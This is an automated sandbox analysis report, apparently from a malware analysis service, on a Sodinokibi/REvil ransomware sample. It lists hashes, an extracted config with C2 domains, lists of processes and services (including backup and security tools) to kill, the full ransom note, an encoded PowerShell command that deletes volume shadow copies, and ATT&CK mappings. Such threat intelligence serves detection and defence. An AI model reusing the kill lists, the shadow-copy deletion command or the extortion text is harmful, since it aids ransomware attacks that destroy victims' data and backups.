Overview

overview

10

Static

static

10

2650b2c6e6...50.exe

windows7_x64

10

2650b2c6e6...50.exe

windows10_x64

10

Analysis

  • max time kernel
    144s
  • max time network
    171s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    24-01-2022 02:24

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    2650b2c6e689cadde5c36b99111d01b2dc0e02c32f3891a9365a6cb6c2337b50.exe

  • Size

    207KB

  • MD5

    8617cf6577b2020b9251a898a98308af

  • SHA1

    c4d7436ab085a6113c4d77b8765504d42a66aece

  • SHA256

    2650b2c6e689cadde5c36b99111d01b2dc0e02c32f3891a9365a6cb6c2337b50

  • SHA512

    1b11cd0de765f97be892cbd8b3d244dd7fd226af2c9f8ddd523aca293c80ca22ec437204ea7f018ca35d9c2cfa2f270c928c5098db5184a8640204a610bb5426

Score
10/10
neshtasodinokibi$2a$10$masqyzcs2s.gezywrfoojui4sirqdq0fr0z6ikbeb4edgqpwynyjq3385persistenceransomwarespywarestealer

Malware Config

Extracted

Path

C:\u4qw07161b-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension u4qw07161b. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/36728C38FD7409E1 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/36728C38FD7409E1 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: lO4o3glkY3NTzLhyqNQKHH0157BC8j023pze6gnKDDxk/oco9vMSz58mmhtNMnHx HyUWdjhvTLuWTIP2+h0W9Z5yJLB2vMezB0RFmjrcOcEF5inBFshlDTvoSeLyITYE sdN0fjBwZfvSi6q/cQjDlPKz3teN2/Mn/6aNTED+ab6QLCE7ekQ5/wY8rBXqZ4MN iz6vECTVn8eSgmRCHEyl8JcMkEU/mab5+1YBkk12DhkFwIj1gtbZSMlKGPlJ+w8f F0RvRgVDpIVilIHLgYKNZ4uAR/mt9xe32wOPYnOuAkNMjrLQvdH6x/SmYaWWxcMY HaYiYvX/5gCBbq5uiBPViJ5CrXIdXTOK1RPPLiSRvJnF1FIm+wUpRXKz31+vS3w7 IGfAUsFJkMKqD1OJJ+1i56Qg69EDLQlijMRMjQ4HVjIOaAQStKrWRofCoSZ7kEQ7 CvSgAPJTvVr4bDGzpEXrvoFZ/YqGQjIgRp42hmd0D3pHYCR/YFvh8mWt70NpfiUs plBy0B62PzTUZreU4+kVIjSGXpVB8hhDXEYiZ6mx8nO4POuUcuOldBnubXoOPRV6 wvR22jR05z1fHVWBi/swXoUT6+ntN4S1AB48z7JbOa+E+V7XHli0j8xQSewE6LzP +ZjyeqxMA8NZP/yxA4aWWSMwUVk2N7Q0SxYPzeXJze4CmfmkOP05HB49haJ/2iHs 4QyXGnpcvSesNT/RWLgpI8IkqUdkB4TANbR+5g1V0+ZOpIpScpmjtPjRV2HRqk4F C0rxiVbVchHWXclN05MLR57UclvYciK4Eaxvwyig1H9iXSauxJ8zP6CPgNOOrdjA fGOCZU/9X3+aeLLl8tbn3llunGaRgovJ7Dxk9o6Koognu+5tmHVmcDbm9CJzdaAi RczXbuG2ItgXfW9QRX2SL0E2qhHeasf0LA3v4m88nDf/kcK6qE/O8H68ffLpnsGs //bG9ZgqyWgdGcuvW/nvNcKleenGyqBeRb+y6mDC9ynGtqiCOoWAacg3h1b9ZjBV eHY12f4Zc1WmdC979Nc7mKTVPGaMM9Dz5naXJi+ZRDTUH9hTF+U+KvAwcsMJXIBU +fFmL8pVjUpGXw125Sh7U2CkNFXBu4zz1uoVUP/+F0n+kgrTX3+bhHvC1yyWtzpW q06ixHqanyJms9cxP4Uq4506IXZniga4lmh735yUqrDz0vPK+Fp6dToes3VvQHzc 2KtAaA9Vf/OWgA+rtwhc75i/R+l5W1H4FYOOSkkUCI7cNRbcCS4QLHE3/O6rA8NS tfuh68qmSXF0R3BL9ixhbQ5JlKZeuL7rb7xBESlcUFs= ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/36728C38FD7409E1

http://decryptor.cc/36728C38FD7409E1

Extracted

Family

sodinokibi

Botnet

$2a$10$maSqYzCs2s.gezYwrFOoJuI4SIRqDq0fr0z6iKBeb4EdgQpwYnYjq

Campaign

3385

C2

balticdermatology.lt

liveottelut.com

michaelsmeriglioracing.com

spsshomeworkhelp.com

campus2day.de

madinblack.com

tanciu.com

agence-referencement-naturel-geneve.net

jakekozmor.com

tinkoff-mobayl.ru

myhealth.net.au

maasreusel.nl

pmc-services.de

evergreen-fishing.com

noskierrenteria.com

galleryartfair.com

importardechina.info

trapiantofue.it

tux-espacios.com

ecoledansemulhouse.fr
Attributes
  • net

    true

  • pid

    $2a$10$maSqYzCs2s.gezYwrFOoJuI4SIRqDq0fr0z6iKBeb4EdgQpwYnYjq

  • prc

    thunderbird

    thebat

    msaccess

    mydesktopqos

    ocomm

    ocautoupds

    outlook

    xfssvccon

    wordpad

    encsvc

    excel

    agntsvc

    sql

    winword

    isqlplussvc

    powerpnt

    ocssd

    dbeng50

    synctime

    visio

    sqbcoreservice

    mspub

    tbirdconfig

    steam

    dbsnmp

    onenote

    oracle

    firefox

    infopath

    mydesktopservice

  • ransom_oneliner

    All of your files are encrypted! Find {EXT}-readme.txt and follow instuctions

  • ransom_template

    ---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension {EXT}. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/{UID} 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/{UID} Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: {KEY} ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!

  • sub

    3385

  • svc

    veeam

    backup

    vss

    sql

    memtas

    svc$

    mepocs

    sophos

Signatures

  • Modifies system executable filetype association 2 TTPs 1 IoCs
    persistence
  • Neshta

    Malware from the neshta family is designed to infect itself into other files to spread itself and cause damage.

    persistencespywareneshta
  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

    ransomwaresodinokibi
  • Executes dropped EXE 1 IoCs
  • Modifies extensions of user files 16 IoCs

    Ransomware generally changes the extension on encrypted files.

    ransomware
  • Loads dropped DLL 3 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Adds Run key to start application 2 TTPs 2 IoCs
    persistence
  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in System32 directory 1 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
    ransomware
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies registry class 1 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
    evasionspywaretrojan
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2650b2c6e689cadde5c36b99111d01b2dc0e02c32f3891a9365a6cb6c2337b50.exe
    "C:\Users\Admin\AppData\Local\Temp\2650b2c6e689cadde5c36b99111d01b2dc0e02c32f3891a9365a6cb6c2337b50.exe"
    1⤵
    • Modifies system executable filetype association
    • Loads dropped DLL
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:844
    • C:\Users\Admin\AppData\Local\Temp\3582-490\2650b2c6e689cadde5c36b99111d01b2dc0e02c32f3891a9365a6cb6c2337b50.exe
      "C:\Users\Admin\AppData\Local\Temp\3582-490\2650b2c6e689cadde5c36b99111d01b2dc0e02c32f3891a9365a6cb6c2337b50.exe"
      2⤵
      • Executes dropped EXE
      • Modifies extensions of user files
      • Adds Run key to start application
      • Enumerates connected drives
      • Drops file in System32 directory
      • Sets desktop wallpaper using registry
      • Drops file in Program Files directory
      • Modifies system certificate store
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:468
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:572
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:1816
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:952

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Initial Access

    Execution

    Persistence

    Change Default File Association

    1
    T1042

    Registry Run Keys / Startup Folder

    1
    T1060

    Privilege Escalation

    Defense Evasion

    Modify Registry

    4
    T1112

    Install Root Certificate

    1
    T1130

    Credential Access

    Credentials in Files

    1
    T1081

    Discovery

    Query Registry

    1
    T1012

    Peripheral Device Discovery

    1
    T1120

    System Information Discovery

    2
    T1082

    Lateral Movement

    Collection

    Data from Local System

    1
    T1005

    Exfiltration

    Command and Control

    Impact

    Defacement

    1
    T1491

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\3582-490\2650b2c6e689cadde5c36b99111d01b2dc0e02c32f3891a9365a6cb6c2337b50.exe
      MD5

      340b6f816bfdcfcb466cfc126c976844

      SHA1

      e2e3adfcf621166a9f5bb7ee9795b7914cda2095

      SHA256

      3cff33197edc918d47d08f44d6ddbdda157337f0ad58288d15746cf72c0e4c57

      SHA512

      3e729878fe7ae2ea2f025d71d78226ddb5930b791143eb8c4ba4a7589d5944e5b0e37e8ffe1ea4983bbc66c71587e3a4b158b3e8a2b71ccbed2889c4778962f9

      Download Submit
    • \PROGRA~2\Adobe\READER~1.0\Reader\LOGTRA~1.EXE
      MD5

      9e2b9928c89a9d0da1d3e8f4bd96afa7

      SHA1

      ec66cda99f44b62470c6930e5afda061579cde35

      SHA256

      8899b4ed3446b7d55b54defbc1acb7c5392a4b3bc8ec2cdc7c31171708965043

      SHA512

      2ca5ad1d0e12a8049de885b90b7f56fe77c868e0d6dae4ec4b6f3bc0bf7b2e73295cc9b1328c2b45357ffb0d7804622ab3f91a56140b098e93b691032d508156

      Download Submit
    • \Users\Admin\AppData\Local\Temp\3582-490\2650b2c6e689cadde5c36b99111d01b2dc0e02c32f3891a9365a6cb6c2337b50.exe
      MD5

      340b6f816bfdcfcb466cfc126c976844

      SHA1

      e2e3adfcf621166a9f5bb7ee9795b7914cda2095

      SHA256

      3cff33197edc918d47d08f44d6ddbdda157337f0ad58288d15746cf72c0e4c57

      SHA512

      3e729878fe7ae2ea2f025d71d78226ddb5930b791143eb8c4ba4a7589d5944e5b0e37e8ffe1ea4983bbc66c71587e3a4b158b3e8a2b71ccbed2889c4778962f9

      Download Submit
    • \Users\Admin\AppData\Local\Temp\3582-490\2650b2c6e689cadde5c36b99111d01b2dc0e02c32f3891a9365a6cb6c2337b50.exe
      MD5

      340b6f816bfdcfcb466cfc126c976844

      SHA1

      e2e3adfcf621166a9f5bb7ee9795b7914cda2095

      SHA256

      3cff33197edc918d47d08f44d6ddbdda157337f0ad58288d15746cf72c0e4c57

      SHA512

      3e729878fe7ae2ea2f025d71d78226ddb5930b791143eb8c4ba4a7589d5944e5b0e37e8ffe1ea4983bbc66c71587e3a4b158b3e8a2b71ccbed2889c4778962f9

      Download Submit
    • memory/572-59-0x000007FEFBC11000-0x000007FEFBC13000-memory.dmp
      Filesize

      8KB

      Download
    • memory/572-60-0x000007FEF2FB0000-0x000007FEF3B0D000-memory.dmp
      Filesize

      11.4MB

      Download
    • memory/572-61-0x0000000002310000-0x0000000002312000-memory.dmp
      Filesize

      8KB

      Download
    • memory/572-62-0x0000000002312000-0x0000000002314000-memory.dmp
      Filesize

      8KB

      Download
    • memory/572-63-0x0000000002314000-0x0000000002317000-memory.dmp
      Filesize

      12KB

      Download
    • memory/572-64-0x000000000231B000-0x000000000233A000-memory.dmp
      Filesize

      124KB

      Download
    • memory/844-54-0x0000000076151000-0x0000000076153000-memory.dmp
      Filesize

      8KB

      Download